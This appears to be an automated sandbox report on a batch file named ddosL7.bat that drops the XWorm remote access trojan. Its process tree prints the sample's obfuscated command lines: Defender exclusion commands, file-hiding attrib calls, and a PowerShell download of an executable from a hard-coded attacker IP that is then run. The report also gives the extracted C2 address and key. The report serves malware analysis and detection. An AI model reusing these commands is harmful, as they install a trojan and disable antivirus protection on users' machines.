Analysis
max time kernel: 594s
max time network: 600s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-06-2024 13:58
Static task: static1
General
Target: ddosL7.bat
Size: 14KB
MD5: cf5eda10b8afb767c9aa90c2e60da074
SHA1: be2394dc599ca6d30b910bc96acbf5d83c09aee7
SHA256: 35024af1d65a1a627714e6ead42382b5952f97fef015f16634a2ca4c80e58438
SHA512: 83a6f144def80543ca523bbf0574d6e133773591b83f9ddf618f29742c92cc200a959db0e9d056ec871ee776aa9c7a0fe0294f366f65465148185e619e861faf
SSDEEP: 96:ygDHeGfNhaenzfUP+FdRdIYAsPbPFfIYAuP1D5e1dIYAW7:PrxfnduP
Malware Config
Extracted
Family: xworm
Version: 5.0
45.141.26.232:6666
omb7mZjvAq0auoSy
Install_directory: %ProgramData%
install_file: Java Update Checker (64 bit).exe
Signatures

Detect Xworm Payload (2 IoCs)
resource / yara_rule:
C:\Users\Admin\AppData\Local\Temp\java_update.exe  family_xworm
behavioral1/memory/3208-48-0x00000000007E0000-0x00000000007F0000-memory.dmp  family_xworm

Blocklisted process makes network request (1 IoCs)
flow / pid / process:
16  4648  powershell.exe

Command and Scripting Interpreter: PowerShell
pid / process:
1592  powershell.exe
3888  powershell.exe
3004  powershell.exe
3016  powershell.exe
1052  powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description / ioc / process:
Key value queried  \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation  java_update.exe

Drops startup file (2 IoCs)
description / ioc / process:
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk  java_update.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update Checker (64 bit).lnk  java_update.exe

Executes dropped EXE (1 IoCs)
pid / process:
3208  java_update.exe

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow / ioc:
18  ip-api.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (20 IoCs)
pid / process:
1592 powershell.exe, 1592 powershell.exe, 3240 powershell.exe, 3240 powershell.exe, 4648 powershell.exe, 4648 powershell.exe, 3888 powershell.exe, 3888 powershell.exe, 3888 powershell.exe, 3004 powershell.exe, 3004 powershell.exe, 3004 powershell.exe, 3016 powershell.exe, 3016 powershell.exe, 3016 powershell.exe, 1052 powershell.exe, 1052 powershell.exe, 1052 powershell.exe, 3208 java_update.exe, 3208 java_update.exe

Suspicious use of AdjustPrivilegeToken (9 IoCs)
description / pid / process:
Token: SeDebugPrivilege  1592  powershell.exe
Token: SeDebugPrivilege  3240  powershell.exe
Token: SeDebugPrivilege  4648  powershell.exe
Token: SeDebugPrivilege  3208  java_update.exe
Token: SeDebugPrivilege  3888  powershell.exe
Token: SeDebugPrivilege  3004  powershell.exe
Token: SeDebugPrivilege  3016  powershell.exe
Token: SeDebugPrivilege  1052  powershell.exe
Token: SeDebugPrivilege  3208  java_update.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid / process:
3208  java_update.exe

Suspicious use of WriteProcessMemory (20 IoCs)
description / pid / process / target process:
PID 3360 wrote to memory of 1592  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 1592  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 3240  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 3240  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 3856  3360  cmd.exe  attrib.exe
PID 3360 wrote to memory of 3856  3360  cmd.exe  attrib.exe
PID 3360 wrote to memory of 4648  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 4648  3360  cmd.exe  powershell.exe
PID 3360 wrote to memory of 3208  3360  cmd.exe  java_update.exe
PID 3360 wrote to memory of 3208  3360  cmd.exe  java_update.exe
PID 3360 wrote to memory of 4000  3360  cmd.exe  attrib.exe
PID 3360 wrote to memory of 4000  3360  cmd.exe  attrib.exe
PID 3208 wrote to memory of 3888  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 3888  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 3004  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 3004  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 3016  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 3016  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 1052  3208  java_update.exe  powershell.exe
PID 3208 wrote to memory of 1052  3208  java_update.exe  powershell.exe

Views/modifies file attributes (1 TTPs, 2 IoCs)
pid / process:
3856  attrib.exe
4000  attrib.exe
Processes

C:\Windows\system32\cmd.exe  (PID 3360)
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ddosL7.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1592)
    command line: powershell -wi"n"dow hi"d"den -command ""
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3240)
    command line: powershell.exe -co"m"mand "Add-MpPref"e"rence -Exclu"s"ionPath "C:\"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\attrib.exe  (PID 3856)
    command line: attrib +h "Anon" /s /d
    - Views/modifies file attributes

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4648)
    command line: Powers"h"ell -Comma"n"d "Invoke-Webr"e"quest 'http://45.141.26.232/java_update.exe' -OutFile java_update.exe"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\java_update.exe  (PID 3208)
    command line: java_update.exe
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3888)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\java_update.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3004)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java_update.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3016)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1052)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\attrib.exe  (PID 4000)
    command line: attrib +h "C:\Users\YOKI CG\AppD"a"ta\Lo"c"al\Anon\java_update.exe /s /d
    - Views/modifies file attributes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (PID 2268)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3988,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (PID 3304)
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4892,i,18168883380598738769,14202261231630113808,262144 --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:8
Network
MITRE ATT&CK Enterprise v15
Downloads